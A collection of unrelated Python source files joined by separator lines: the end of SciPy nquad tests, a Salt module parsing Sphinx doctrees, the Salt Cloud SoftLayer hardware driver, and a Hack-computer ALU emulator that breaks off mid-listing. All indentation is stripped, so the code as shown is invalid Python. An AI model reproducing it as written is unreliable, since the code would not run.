def func2(x0, x1, x2, x3, t0, t1):
val = (x0*x1*x3**2 + np.sin(x2) + 1 +
(1 if x0 + t1*x1 - t0 > 0 else 0))
return val
def lim0(x1, x2, x3, t0, t1):
return [scale * (x1**2 + x2 + np.cos(x3)*t0*t1 + 1) - 1,
scale * (x1**2 + x2 + np.cos(x3)*t0*t1 + 1) + 1]
def lim1(x2, x3, t0, t1):
return [scale * (t0*x2 + t1*x3) - 1,
scale * (t0*x2 + t1*x3) + 1]
def lim2(x3, t0, t1):
return [scale * (x3 + t0**2*t1**3) - 1,
scale * (x3 + t0**2*t1**3) + 1]
def lim3(t0, t1):
return [scale * (t0 + t1) - 1, scale * (t0 + t1) + 1]
def opts0(x1, x2, x3, t0, t1):
return {'points': [t0 - t1*x1]}
def opts1(x2, x3, t0, t1):
return {}
def opts2(x3, t0, t1):
return {}
def opts3(t0, t1):
return {}
res = nquad(func2, [lim0, lim1, lim2, lim3], args=(0, 0),
opts=[opts0, opts1, opts2, opts3])
assert_quad(res, 25.066666666666663)
def test_square_separate_ranges_and_opts(self):
def f(y, x):
return 1.0
assert_quad(nquad(f, [[-1, 1], [-1, 1]], opts=[{}, {}]), 4.0)
def test_square_aliased_ranges_and_opts(self):
def f(y, x):
return 1.0
r = [-1, 1]
opt = {}
assert_quad(nquad(f, [r, r], opts=[opt, opt]), 4.0)
def test_square_separate_fn_ranges_and_opts(self):
def f(y, x):
return 1.0
def fn_range0(*args):
return (-1, 1)
def fn_range1(*args):
return (-1, 1)
def fn_opt0(*args):
return {}
def fn_opt1(*args):
return {}
ranges = [fn_range0, fn_range1]
opts = [fn_opt0, fn_opt1]
assert_quad(nquad(f, ranges, opts=opts), 4.0)
def test_square_aliased_fn_ranges_and_opts(self):
def f(y, x):
return 1.0
def fn_range(*args):
return (-1, 1)
def fn_opt(*args):
return {}
ranges = [fn_range, fn_range]
opts = [fn_opt, fn_opt]
assert_quad(nquad(f, ranges, opts=opts), 4.0)
def test_matching_quad(self):
def func(x):
return x**2 + 1
res, reserr = quad(func, 0, 4)
res2, reserr2 = nquad(func, ranges=[[0, 4]])
assert_almost_equal(res, res2)
assert_almost_equal(reserr, reserr2)
def test_matching_dblquad(self):
def func2d(x0, x1):
return x0**2 + x1**3 - x0 * x1 + 1
res, reserr = dblquad(func2d, -2, 2, lambda x: -3, lambda x: 3)
res2, reserr2 = nquad(func2d, [[-3, 3], (-2, 2)])
assert_almost_equal(res, res2)
assert_almost_equal(reserr, reserr2)
def test_matching_tplquad(self):
def func3d(x0, x1, x2, c0, c1):
return x0**2 + c0 * x1**3 - x0 * x1 + 1 + c1 * np.sin(x2)
res = tplquad(func3d, -1, 2, lambda x: -2, lambda x: 2,
lambda x, y: -np.pi, lambda x, y: np.pi,
args=(2, 3))
res2 = nquad(func3d, [[-np.pi, np.pi], [-2, 2], (-1, 2)], args=(2, 3))
assert_almost_equal(res, res2)
def test_dict_as_opts(self):
try:
out = nquad(lambda x, y: x * y, [[0, 1], [0, 1]], opts={'epsrel': 0.0001})
except(TypeError):
assert False
if __name__ == "__main__":
run_module_suite()
|
|
# -*- coding: utf-8 -*-
# Usage of this is governed by a license that can be found in doc/license.rst.
import logging
import os
import pickle
import yaml
import StringIO
import collections
from ast import literal_eval
logger = logging.getLogger(__name__)
__virtualname__ = 'qa'
def __virtual__():
return __virtualname__
def _import_debug():
logger.debug("packages: %s", __salt__['pkg.list_pkgs']().keys())
logger.debug("pip list: %s", __salt__['pip.list']())
def _get_doctrees(docs_dir):
'''
.. todo:: doc me
:param docs_dir:
:return:
'''
# TODO: switch to __salt__['file.find']
pillars = []
monitors = []
for d, _, files in os.walk(os.path.join(docs_dir, '.doctrees')):
for f in files:
if f == "pillar.doctree":
pillars.append(os.path.join(d, f))
if f == "monitor.doctree":
monitors.append(os.path.join(d, f))
base_len = len(docs_dir.rstrip(os.sep).split(os.sep)) + 1
# default value: two-tuple
doctrees = collections.defaultdict(lambda: [None, None])
def get_name(filename):
return '.'.join(filename.split(os.sep)[base_len:-2])
# load pillar doctrees
for filename in pillars:
with open(filename) as f:
if filename.endswith(".doctrees/doc/pillar.doctree"):
name = 'common'
else:
# the name is the path - the doc/pillar.rst bit
name = get_name(filename)
assert name, ("Couldn't extract the formula name "
"from %s" % filename)
_import_debug()
try:
doctrees[name][0] = pickle.load(f)
try:
from docutils import nodes
logger.debug("Docutils from %s", nodes.__file__)
except ImportError, err:
logger.error("Can't find docutils")
pass
except ImportError, err:
raise err
# load monitors doctrees
for filename in monitors:
with open(filename) as f:
name = get_name(filename)
assert name, "Couldn't extract the formula name from %s" % filename
doctrees[name][1] = pickle.load(f)
return doctrees
def _render(data):
try:
return literal_eval(data)
except (SyntaxError, ValueError):
# this cannot be rendered as a primitive, try with the salt renderer
# NOTE: because `return` is used above, we can avoid try block nesting
pass
try:
import salt
return salt.template.compile_template_str(
data, default=__opts__['renderer'],
renderers=salt.loader.render(__opts__, __salt__))
except (NameError, ImportError):
# this was called from outside of salt or even from a system that
# doesn't have salt installed. Render as simple yaml instead
return yaml.load(StringIO.StringIO(data))
def _parse_pillar(document, root_name="pillar"):
"""
Returns a dictionary with all necessary data a given document. It expects
the document to have the structure described above
"""
try:
from docutils import nodes
logger.debug("Docutils from %s", nodes.__file__)
except ImportError, err:
logger.error("Can't find docutils")
_import_debug()
raise err
ret = {
'_errors': [],
'mandatory': {
'_errors': [],
'keys': [],
'examples': [],
},
'optional': {},
'conditional': {},
}
# if document is None, return an empty dictionary
if not document:
return ret
# get "pillar" sections
pillar_sections = filter(lambda x: (x.tagname == 'section' and
root_name in x.attributes['names']),
document.children)
# should be unique
if len(pillar_sections) != 1:
ret['_errors'].append(
SyntaxError("Bad number of Pillar sections: %d" %
len(pillar_sections)))
for p in pillar_sections:
# find mandatory
mandatory_sections = filter(lambda x: (
x.tagname == 'section' and
'mandatory' in x.attributes['names']), p.children)
# should be unique
if len(mandatory_sections) > 1:
ret['_errors'].append(
SyntaxError("Bad number of mandatory keys sections: %d" %
len(mandatory_sections)))
for mandatory in mandatory_sections:
# find example. Examples are literals straight under the
# "mandatory" section, after a paragraph that starts with
# "Example:"
for i, child in enumerate(mandatory.children):
if child.tagname == 'paragraph':
if child.astext().startswith("Example:"):
if len(mandatory.children) < i:
# it says "Example:" but there's no example literal
ret['mandatory']['_errors'].append(
SyntaxError("Missing literal example "
"section"))
elif (mandatory.children[i+1].tagname !=
'literal_block'):
# it says "Example:" but there's no example literal
ret['mandatory']['_errors'].append(
SyntaxError("Missing literal example section"))
else:
example = mandatory.children[i+1]
ret['mandatory']['examples'].append(
_render(example.astext()))
break
# I expect the keys to be defined directly as the titles of the
# second level
titles = mandatory.traverse(
lambda x: (isinstance(x, nodes.title) and
not x.parent == mandatory),
include_self=False)
#: rendered titles
keys = map(lambda x: x.astext(), titles)
ret['mandatory']['keys'].extend(keys)
# find optional
optional_sections = filter(lambda x: (
x.tagname == 'section' and
'optional' in x.attributes['names']), p.children)
# should be unique
if len(optional_sections) > 1:
ret["_errors"].append(
SyntaxError("Bad number of optional sections: %d" %
len(optional_sections)))
for optional in optional_sections:
# find optional keys
keys = filter(lambda x: x.tagname == 'section', optional.children)
for key in keys:
data = {
'_errors': [],
}
default = None
# I expect the keys to be defined directly as the titles of the
# second level
titles = key.traverse(nodes.title, include_self=False)
#: rendered titles
ttitles = map(lambda x: x.astext(), titles)
assert len(ttitles) == 1, ('too many titles for '
'optional section')
name = ttitles[0]
default_sections = filter(
lambda c: (c.tagname != 'comment' and
c.astext().startswith("Default:")),
key.children)
if not default_sections:
data['_errors'].append(SyntaxError("No default sections"))
elif len(default_sections) > 1:
data['_errors'].append(
SyntaxError("There's more than one default section"))
else:
# I know default_sections is a list of 1
child, = default_sections
defaults = child.traverse(
lambda x: (x.parent == child and
isinstance(x, nodes.literal)),
include_self=False)
if not defaults:
data['_errors'].append(
SyntaxError("No default values"))
try:
default = _render(defaults[0].astext())
except Exception, e:
default = e
data['default'] = default
ret['optional'][name] = data
# find conditional
conditional_sections = filter(lambda x: (
x.tagname == 'section' and
'conditional' in x.attributes['names']), p.children)
# should be unique
if len(conditional_sections) > 1:
ret["_errors"].append(
SyntaxError("Bad number of conditional sections: %d" %
len(conditional_sections)))
for conditional in conditional_sections:
# find conditional keys
keys = filter(lambda x: x.tagname == 'section',
conditional.children)
for key in keys:
data = {
'_errors': [],
}
# I expect the keys to be defined directly as the titles of the
# second level
titles = key.traverse(nodes.title, include_self=False)
#: rendered titles
ttitles = map(lambda x: x.astext(), titles)
assert len(ttitles) == 1, ('too many titles for '
'optional section')
name = ttitles[0]
default = None
default_sections = filter(
lambda c: (c.tagname != 'comment' and
c.astext().startswith("Default:")),
key.children)
if len(default_sections) > 1:
data['_errors'].append(
SyntaxError("There's more than one default section"))
elif default_sections:
# I know default_sections is a list of 1
child, = default_sections
defaults = child.traverse(
lambda x: (x.parent == child and
isinstance(x, nodes.literal)),
include_self=False)
if not defaults:
data['_errors'].append(
SyntaxError("No default values"))
elif len(defaults) > 1:
data['_errors'].append(
SyntaxError("Multiple default values: %s" %
" | ".join(d.astext()
for d in defaults)))
try:
default = _render(defaults[0].astext())
except Exception, e:
default = e
data['default'] = default
ret['conditional'][name] = data
return ret
def _parse_monitor(document):
from docutils import nodes
ret = {
'_errors': [],
'mandatory': [],
'optional': [],
}
if not document:
return ret
# get "monitor" sections
monitor_sections = filter(lambda x: (x.tagname == 'section' and
'monitor' in x.attributes['names']),
document.children)
# should be unique
if len(monitor_sections) != 1:
ret['_errors'].append(
SyntaxError("Bad number of Monitor sections: %d" %
len(monitor_sections)))
for m in monitor_sections:
mandatory_sections = filter(
lambda x: (x.tagname == 'section' and
'mandatory' in x.attributes['names']),
m.children)
if len(mandatory_sections) > 1:
ret['_errors'].append(
SyntaxError("Bad number of mandatory monitor sections: %d" %
len(mandatory_sections)))
for mandatory in mandatory_sections:
checks = mandatory.traverse(nodes.section, include_self=False)
# the name is the first title in each section
titles = [c.traverse(nodes.title, include_self=False)[0].astext()
for c in checks]
ret['mandatory'].extend(titles)
optional_sections = filter(lambda x: (
x.tagname == 'section' and
'optional' in x.attributes['names']), m.children)
if len(optional_sections) > 1:
ret['_errors'].append(
SyntaxError("Bad number of optional monitor sections: %d" %
len(optional_sections)))
for optional in optional_sections:
checks = optional.traverse(nodes.section, include_self=False)
# the name is the first title in each section
titles = [c.traverse(nodes.title, include_self=False)[0].astext()
for c in checks]
ret['optional'].extend(titles)
return ret
def _example_pillars(parsed_doctree):
"""
Returns a list of pillar dictionaries as they have been documented in
doc/pillar.rst
:param parsed_doctree: the return value of :func:`parse_doctrees`
"""
ret = []
for fdata in parsed_doctree.itervalues():
# this supports each mandatory section having more than one example
# although it is reported as an error elsewhere
ret.extend(fdata['mandatory']['examples'])
return ret
def parse_doctrees(docs_dir):
'''
Parse sphinx doctrees
:param docs_dir: TODO FIX ME
:return: a dictionary
like::
{
formula: {
<structure documented in _parse_pillar()>
'_monitor': _parse_monitor()
}
}
'''
ret = {}
doctrees = _get_doctrees(docs_dir)
for name, (pillar, monitor) in doctrees.iteritems():
try:
if name != 'common':
ret[name] = _parse_pillar(pillar)
else:
ret[name] = _parse_pillar(pillar, root_name='global pillar')
except Exception, e:
ret[name] = {'_errors': [e]}
try:
# HACK, TODO:
# it should really be ret = { 'pillar': parse_pillar,
# 'monitor': parse_monitor}
# but that means changes in several places now.
ret[name]['_monitor'] = _parse_monitor(monitor)
except Exception, e:
ret[name]['_monitor'] = {'_errors': [e], 'checks': []}
return ret
|
|
# -*- coding: utf-8 -*-
'''
SoftLayer HW Cloud Module
=========================
The SoftLayer HW cloud module is used to control access to the SoftLayer
hardware cloud system
Use of this module only requires the ``apikey`` parameter. Set up the cloud
configuration at:
``/etc/salt/cloud.providers`` or ``/etc/salt/cloud.providers.d/softlayer.conf``:
.. code-block:: yaml
my-softlayer-config:
# SoftLayer account api key
user: MYLOGIN
apikey: JVkbSJDGHSDKUKSDJfhsdklfjgsjdkflhjlsdfffhgdgjkenrtuinv
driver: softlayer_hw
The SoftLayer Python Library needs to be installed in order to use the
SoftLayer salt.cloud modules. See: https://pypi.python.org/pypi/SoftLayer
:depends: softlayer
'''
# Import python libs
from __future__ import absolute_import
import logging
import time
import decimal
# Import salt cloud libs
import salt.utils.cloud
import salt.config as config
from salt.exceptions import SaltCloudSystemExit
# Attempt to import softlayer lib
try:
import SoftLayer
HAS_SLLIBS = True
except ImportError:
HAS_SLLIBS = False
# Get logging started
log = logging.getLogger(__name__)
__virtualname__ = 'softlayer_hw'
# Only load in this module if the SoftLayer configurations are in place
def __virtual__():
'''
Check for SoftLayer configurations.
'''
if get_configured_provider() is False:
return False
if get_dependencies() is False:
return False
return __virtualname__
def get_configured_provider():
'''
Return the first configured instance.
'''
return config.is_provider_configured(
__opts__,
__active_provider_name__ or __virtualname__,
('apikey',)
)
def get_dependencies():
'''
Warn if dependencies aren't met.
'''
return config.check_driver_dependencies(
__virtualname__,
{'softlayer': HAS_SLLIBS}
)
def script(vm_):
'''
Return the script deployment object
'''
deploy_script = salt.utils.cloud.os_script(
config.get_cloud_config_value('script', vm_, __opts__),
vm_,
__opts__,
salt.utils.cloud.salt_config_to_yaml(
salt.utils.cloud.minion_config(__opts__, vm_)
)
)
return deploy_script
def get_conn(service='SoftLayer_Hardware'):
'''
Return a conn object for the passed VM data
'''
client = SoftLayer.Client(
username=config.get_cloud_config_value(
'user', get_configured_provider(), __opts__, search_global=False
),
api_key=config.get_cloud_config_value(
'apikey', get_configured_provider(), __opts__, search_global=False
),
)
return client[service]
def avail_locations(call=None):
'''
List all available locations
'''
if call == 'action':
raise SaltCloudSystemExit(
'The avail_locations function must be called with '
'-f or --function, or with the --list-locations option'
)
ret = {}
conn = get_conn(service='SoftLayer_Product_Package')
locations = conn.getLocations(id=50)
for location in locations:
ret[location['id']] = {
'id': location['id'],
'name': location['name'],
'location': location['longName'],
}
available = conn.getAvailableLocations(id=50)
for location in available:
if location.get('isAvailable', 0) is 0:
continue
ret[location['locationId']]['available'] = True
return ret
def avail_sizes(call=None):
'''
Return a dict of all available VM sizes on the cloud provider with
relevant data. This data is provided in three dicts.
'''
if call == 'action':
raise SaltCloudSystemExit(
'The avail_sizes function must be called with '
'-f or --function, or with the --list-sizes option'
)
ret = {}
conn = get_conn(service='SoftLayer_Product_Package')
for category in conn.getCategories(id=50):
if category['categoryCode'] != 'server_core':
continue
for group in category['groups']:
for price in group['prices']:
ret[price['id']] = price['item'].copy()
del ret[price['id']]['id']
return ret
def avail_images(call=None):
'''
Return a dict of all available VM images on the cloud provider.
'''
if call == 'action':
raise SaltCloudSystemExit(
'The avail_images function must be called with '
'-f or --function, or with the --list-images option'
)
ret = {}
conn = get_conn(service='SoftLayer_Product_Package')
for category in conn.getCategories(id=50):
if category['categoryCode'] != 'os':
continue
for group in category['groups']:
for price in group['prices']:
ret[price['id']] = price['item'].copy()
del ret[price['id']]['id']
return ret
def get_location(vm_=None):
'''
Return the location to use, in this order:
- CLI parameter
- VM parameter
- Cloud profile setting
'''
return __opts__.get(
'location',
config.get_cloud_config_value(
'location',
vm_ or get_configured_provider(),
__opts__,
#default=DEFAULT_LOCATION,
search_global=False
)
)
def create(vm_):
'''
Create a single VM from a data dict
'''
try:
# Check for required profile parameters before sending any API calls.
if vm_['profile'] and config.is_profile_configured(__opts__,
__active_provider_name__ or 'softlayer_hw',
vm_['profile'],
vm_=vm_) is False:
return False
except AttributeError:
pass
# Since using "provider: <provider-engine>" is deprecated, alias provider
# to use driver: "driver: <provider-engine>"
if 'provider' in vm_:
vm_['driver'] = vm_.pop('provider')
name = vm_['name']
hostname = name
domain = config.get_cloud_config_value(
'domain', vm_, __opts__, default=None
)
if domain is None:
SaltCloudSystemExit(
'A domain name is required for the SoftLayer driver.'
)
if vm_.get('use_fqdn'):
name = '.'.join([name, domain])
vm_['name'] = name
__utils__['cloud.fire_event'](
'event',
'starting create',
'salt/cloud/{0}/creating'.format(name),
{
'name': name,
'profile': vm_['profile'],
'provider': vm_['driver'],
},
transport=__opts__['transport']
)
log.info('Creating Cloud VM {0}'.format(name))
conn = get_conn(service='SoftLayer_Product_Order')
kwargs = {
'complexType': 'SoftLayer_Container_Product_Order_Hardware_Server',
'quantity': 1,
'hardware': [{
'hostname': hostname,
'domain': domain,
}],
# Baremetal Package
'packageId': 50,
'prices': [
# Size Ex: 1921: 2 x 2.0 GHz Core Bare Metal Instance - 2 GB Ram
{'id': vm_['size']},
# HDD Ex: 19: 250GB SATA II
{'id': vm_['hdd']},
# Image Ex: 13963: CentOS 6.0 - Minimal Install (64 bit)
{'id': vm_['image']},
# The following items are currently required
# Reboot / Remote Console
{'id': '905'},
# 1 IP Address
{'id': '21'},
# Host Ping Monitoring
{'id': '55'},
# Email and Ticket Notifications
{'id': '57'},
# Automated Notification Response
{'id': '58'},
# Unlimited SSL VPN Users & 1 PPTP VPN User per account
{'id': '420'},
# Nessus Vulnerability Assessment & Reporting
{'id': '418'},
],
}
optional_products = config.get_cloud_config_value(
'optional_products', vm_, __opts__, default=[]
)
for product in optional_products:
kwargs['prices'].append({'id': product})
# Default is 273 (100 Mbps Public & Private Networks)
port_speed = config.get_cloud_config_value(
'port_speed', vm_, __opts__, default=273
)
kwargs['prices'].append({'id': port_speed})
# Default is 1800 (0 GB Bandwidth)
bandwidth = config.get_cloud_config_value(
'bandwidth', vm_, __opts__, default=1800
)
kwargs['prices'].append({'id': bandwidth})
post_uri = config.get_cloud_config_value(
'post_uri', vm_, __opts__, default=None
)
if post_uri:
kwargs['prices'].append({'id': post_uri})
vlan_id = config.get_cloud_config_value(
'vlan', vm_, __opts__, default=False
)
if vlan_id:
kwargs['primaryNetworkComponent'] = {
'networkVlan': {
'id': vlan_id,
}
}
location = get_location(vm_)
if location:
kwargs['location'] = location
__utils__['cloud.fire_event'](
'event',
'requesting instance',
'salt/cloud/{0}/requesting'.format(name),
{'kwargs': kwargs},
transport=__opts__['transport']
)
try:
response = conn.placeOrder(kwargs)
# Leaving the following line in, commented, for easy debugging
#response = conn.verifyOrder(kwargs)
except Exception as exc:
log.error(
'Error creating {0} on SoftLayer\n\n'
'The following exception was thrown when trying to '
'run the initial deployment: \n{1}'.format(
name, str(exc)
),
# Show the traceback if the debug logging level is enabled
exc_info_on_loglevel=logging.DEBUG
)
return False
def wait_for_ip():
'''
Wait for the IP address to become available
'''
nodes = list_nodes_full()
if 'primaryIpAddress' in nodes[hostname]:
return nodes[hostname]['primaryIpAddress']
time.sleep(1)
return False
ip_address = salt.utils.cloud.wait_for_fun(
wait_for_ip,
timeout=config.get_cloud_config_value(
'wait_for_fun_timeout', vm_, __opts__, default=15 * 60),
)
ssh_connect_timeout = config.get_cloud_config_value(
# 15 minutes
'ssh_connect_timeout', vm_, __opts__, 900
)
if not salt.utils.cloud.wait_for_port(ip_address,
timeout=ssh_connect_timeout):
raise SaltCloudSystemExit(
'Failed to authenticate against remote ssh'
)
pass_conn = get_conn(service='SoftLayer_Account')
mask = {
'virtualGuests': {
'powerState': '',
'operatingSystem': {
'passwords': ''
},
},
}
def get_passwd():
'''
Wait for the password to become available
'''
node_info = pass_conn.getVirtualGuests(id=response['id'], mask=mask)
for node in node_info:
if node['id'] == response['id'] \
and 'passwords' in node['operatingSystem'] \
and len(node['operatingSystem']['passwords']) > 0:
return node['operatingSystem']['passwords'][0]['password']
time.sleep(5)
return False
passwd = salt.utils.cloud.wait_for_fun(
get_passwd,
timeout=config.get_cloud_config_value(
'wait_for_fun_timeout', vm_, __opts__, default=15 * 60),
)
response['password'] = passwd
response['public_ip'] = ip_address
ssh_username = config.get_cloud_config_value(
'ssh_username', vm_, __opts__, default='root'
)
vm_['ssh_host'] = ip_address
vm_['password'] = passwd
ret = __utils__['cloud.bootstrap'](vm_, __opts__)
ret.update(response)
__utils__['cloud.fire_event'](
'event',
'created instance',
'salt/cloud/{0}/created'.format(name),
{
'name': name,
'profile': vm_['profile'],
'provider': vm_['driver'],
},
transport=__opts__['transport']
)
return ret
def list_nodes_full(mask='mask[id, hostname, primaryIpAddress, \
primaryBackendIpAddress, processorPhysicalCoreAmount, memoryCount]',
call=None):
'''
Return a list of the VMs that are on the provider
'''
if call == 'action':
raise SaltCloudSystemExit(
'The list_nodes_full function must be called with -f or --function.'
)
ret = {}
conn = get_conn(service='SoftLayer_Account')
response = conn.getHardware(mask=mask)
for node in response:
ret[node['hostname']] = node
__utils__['cloud.cache_node_list'](ret, __active_provider_name__.split(':')[0], __opts__)
return ret
def list_nodes(call=None):
'''
Return a list of the VMs that are on the provider
'''
if call == 'action':
raise SaltCloudSystemExit(
'The list_nodes function must be called with -f or --function.'
)
ret = {}
nodes = list_nodes_full()
if 'error' in nodes:
raise SaltCloudSystemExit(
'An error occurred while listing nodes: {0}'.format(
nodes['error']['Errors']['Error']['Message']
)
)
for node in nodes:
ret[node] = {
'id': nodes[node]['hostname'],
'ram': nodes[node]['memoryCount'],
'cpus': nodes[node]['processorPhysicalCoreAmount'],
}
if 'primaryIpAddress' in nodes[node]:
ret[node]['public_ips'] = nodes[node]['primaryIpAddress']
if 'primaryBackendIpAddress' in nodes[node]:
ret[node]['private_ips'] = nodes[node]['primaryBackendIpAddress']
return ret
def list_nodes_select(call=None):
'''
Return a list of the VMs that are on the provider, with select fields
'''
return salt.utils.cloud.list_nodes_select(
list_nodes_full(), __opts__['query.selection'], call,
)
def show_instance(name, call=None):
'''
Show the details from SoftLayer concerning a guest
'''
if call != 'action':
raise SaltCloudSystemExit(
'The show_instance action must be called with -a or --action.'
)
nodes = list_nodes_full()
__utils__['cloud.cache_node'](nodes[name], __active_provider_name__, __opts__)
return nodes[name]
def destroy(name, call=None):
'''
Destroy a node.
CLI Example:
.. code-block:: bash
salt-cloud --destroy mymachine
'''
if call == 'function':
raise SaltCloudSystemExit(
'The destroy action must be called with -d, --destroy, '
'-a or --action.'
)
__utils__['cloud.fire_event'](
'event',
'destroying instance',
'salt/cloud/{0}/destroying'.format(name),
{'name': name},
transport=__opts__['transport']
)
# If the VM was created with use_fqdn, the short hostname will be used instead.
name = name.split('.')[0]
node = show_instance(name, call='action')
conn = get_conn(service='SoftLayer_Ticket')
response = conn.createCancelServerTicket(
{
'id': node['id'],
'reason': 'Salt Cloud Hardware Server Cancellation',
'content': 'Please cancel this server',
'cancelAssociatedItems': True,
'attachmentType': 'HARDWARE',
}
)
__utils__['cloud.fire_event'](
'event',
'destroyed instance',
'salt/cloud/{0}/destroyed'.format(name),
{'name': name},
transport=__opts__['transport']
)
if __opts__.get('update_cachedir', False) is True:
__utils__['cloud.delete_minion_cachedir'](name, __active_provider_name__.split(':')[0], __opts__)
return response
def list_vlans(call=None):
'''
List all VLANs associated with the account
'''
if call != 'function':
raise SaltCloudSystemExit(
'The list_vlans function must be called with -f or --function.'
)
conn = get_conn(service='SoftLayer_Account')
return conn.getNetworkVlans()
def show_pricing(kwargs=None, call=None):
'''
Show pricing for a particular profile. This is only an estimate, based on
unofficial pricing sources.
CLI Examples:
.. code-block:: bash
salt-cloud -f show_pricing my-softlayerhw-config profile=my-profile
If pricing sources have not been cached, they will be downloaded. Once they
have been cached, they will not be updated automatically. To manually update
all prices, use the following command:
.. code-block:: bash
salt-cloud -f update_pricing <provider>
.. versionadded:: 2015.8.0
'''
profile = __opts__['profiles'].get(kwargs['profile'], {})
if not profile:
return {'Error': 'The requested profile was not found'}
# Make sure the profile belongs to Softlayer HW
provider = profile.get('provider', '0:0')
comps = provider.split(':')
if len(comps) < 2 or comps[1] != 'softlayer_hw':
return {'Error': 'The requested profile does not belong to Softlayer HW'}
raw = {}
ret = {}
ret['per_hour'] = 0
conn = get_conn(service='SoftLayer_Product_Item_Price')
for item in profile:
if item in ('profile', 'provider', 'location'):
continue
price = conn.getObject(id=profile[item])
raw[item] = price
ret['per_hour'] += decimal.Decimal(price.get('hourlyRecurringFee', 0))
ret['per_day'] = ret['per_hour'] * 24
ret['per_week'] = ret['per_day'] * 7
ret['per_month'] = ret['per_day'] * 30
ret['per_year'] = ret['per_week'] * 52
if kwargs.get('raw', False):
ret['_raw'] = raw
return {profile['profile']: ret}
def show_all_prices(call=None, kwargs=None):
'''
Return a dict of all prices on the cloud provider.
'''
if call == 'action':
raise SaltCloudSystemExit(
'The show_all_prices function must be called with -f or --function.'
)
if kwargs is None:
kwargs = {}
conn = get_conn(service='SoftLayer_Product_Package')
if 'code' not in kwargs:
return conn.getCategories(id=50)
ret = {}
for category in conn.getCategories(id=50):
if category['categoryCode'] != kwargs['code']:
continue
for group in category['groups']:
for price in group['prices']:
ret[price['id']] = price['item'].copy()
del ret[price['id']]['id']
return ret
def show_all_categories(call=None):
'''
Return a dict of all available categories on the cloud provider.
.. versionadded:: 2016.3.0
'''
if call == 'action':
raise SaltCloudSystemExit(
'The show_all_categories function must be called with -f or --function.'
)
conn = get_conn(service='SoftLayer_Product_Package')
categories = []
for category in conn.getCategories(id=50):
categories.append(category['categoryCode'])
return {'category_codes': categories}
|
|
'''----------------------------- Imports -----------------------------'''
# Built ins
import math
# Hack computer
from ._x__components import *
'''----------------------------- Helpers -----------------------------'''
def zeroN_( N ):
return ( 0, ) * N
def oneN_( N ):
return ( 0, ) * ( N - 1 ) + ( 1, )
def isZeroN_( N, x ):
return not_( orNto1_( N, x ) )
def isNegative_( x ):
# Twos complement, MSB is one if negative
return x[ 0 ]
'''----------------------------- Adders -----------------------------'''
# MSB to LSB
def halfAdder_( a, b ):
summ = xor_( a, b )
carry = and_( a, b )
return ( summ, carry )
def fullAdder_( a, b, cIn ):
summ1, carry1 = halfAdder_( a, b )
summ2, carry2 = halfAdder_( summ1, cIn )
cOut = or_( carry1, carry2 )
return ( summ2, cOut )
def rippleCarryAdderN_( N, a, b ):
''' N bit ripple adder '''
summ = [ None ] * N
carry = 0
for i in range( N - 1, - 1, - 1 ): # (N - 1)..0, R to L
summ[i], carry = fullAdder_( a[i], b[i], carry )
return summ
def addN_( N, a, b ):
return rippleCarryAdderN_( N, a, b )
def incrementN_( N, x ):
''' Add one '''
# Use addN_ --
# return addN_( N, x, oneN_( N ) )
# Use shortcut --
# return fastIncrement_( x )
# Use cascaded half adders --
summ = [ None ] * N
carry = 1 # add one
for i in range ( N - 1, - 1, - 1 ): # (N - 1)..0, R to L
summ[i], carry = halfAdder_( x[i], carry )
return summ
def fastIncrement_( x ):
''' Keep flipping RtoL till flip a zero '''
# Is this implementable with logic gates? See vid 2.3
# Doubt it atm due to break-statement
x = list( x ) # mutable
for i in range ( len( x ) - 1, - 1, - 1 ): # RtoL
x[i] = not_( x[i] )
if x[i] == 1: # flipped a zero
break
return tuple( x )
'''--------------------------- Subtractors ---------------------------'''
# MSB to LSB
def halfSubtractor_( a, b ):
# a - b
diff = xor_( a, b )
borrow = and_( not_( a ), b )
return ( diff, borrow )
def fullSubtractor_( a, b, c ):
# c is the borrow bit from the previous circuit
diff1, borrow1 = halfSubtractor_( a, b )
diff2, borrow2 = halfSubtractor_( diff1, c )
borrow = or_( borrow1, borrow2 )
return ( diff2, borrow )
def subtractN_( N, a, b ):
''' N bit subractor, takes and outputs Nbit numbers
if a < b, answer returned is in 2s complement
'''
diff = [ None ] * N
borrow = 0
for i in range( N - 1, - 1, - 1 ): # (N - 1)..0, R to L
diff[i], borrow = fullSubtractor_( a[i], b[i], borrow )
return diff
def subtractN_v2_( N, a, b ):
''' 2s complement addition
ex. 7 - 5 = 7 + (-5) = 7 + (2**n - 5)
'''
b_2s = negateN_( N, b ) # 2s complement
return addN_( N, a, b_2s )
'''--------------------------- Negation ---------------------------'''
# MSB to LSB
def negateN_( N, x ):
''' 2s complement -> -x = 2^n - x = ( 2^n - 1 ) - x + 1 '''
## ( 2^n - 1 ) - x aka flip x's bits
temp = tuple( not_( b ) for b in x )
## Add 1
return incrementN_( N, temp )
'''------------------------- Shift Registers -------------------------'''
# MSB to LSB
def shiftRightN_( N, x, y ):
''' N bit barrel shifter (right) '''
ns = int( math.log( N , 2 ) ) # number of shift bits
t = []
for i in range( ns ):
t.append( [ None ] * N )
for j in range( ns ):
p2 = 2 ** j
h = x if j == 0 else t[ j - 1 ]
y_idx = N - j - 1
for i in range( N - 1, p2 - 1, - 1 ):
t[ j ][ i ] = mux_( h[ i - p2 ], h[ i ], y[ y_idx ] )
for k in range( p2 - 1, - 1, - 1 ):
t[ j ][ k ] = mux_( 0, h[ k ], y[ y_idx ] )
return t[ ns - 1 ]
def shiftLeftN_( N, x, y ):
''' N bit barrel shifter (left) '''
ns = int( math.log( N , 2 ) ) # number of shift bits
t = []
for i in range( ns ):
t.append( [ None ] * N )
for j in range ( ns ):
p2 = 2 ** j
h = x if j == 0 else t[ j - 1 ]
y_idx = N - j - 1
for k in range( N - 1, N - 1 - p2 , - 1 ):
t[ j ][ k ] = mux_( 0, h[ k ], y[ y_idx ] )
for i in range( N - 1 - p2, - 1, - 1 ):
t[ j ][ i ] = mux_( h[ i + p2 ], h[ i ], y[ y_idx ] )
return t[ ns - 1 ]
'''--------------------- Arithmetic Logic Unit ---------------------'''
# MSB to LSB
def ALU_( N, x, y, control ):
''' N bit ALU '''
'''
fx
0 - add
1 - and
2 - xor
3 - lsr
4 - lsl
5 - mul
6 - div
7 - fpAdd
8 - fpSub
9 - fpMul
10 - fpDiv
lookup ROM
op fsel flags composite
----- ---- ----- ----------
0 add zx, zy 0000 10100
1 add zx, nx, zy, ny, no 0000 11111
- 1 add zx, nx, zy 0000 11100
x and zy, ny 0001 00110
! x and zy, ny, no 0001 00111
- x add zy, ny, no 0000 00111
x + 1 add nx, zy, ny, no 0000 01111
x - 1 add zy, ny 0000 00110
x + y add 0000 00000
x - y add nx, no 0000 01001
x & y and 0001 00000
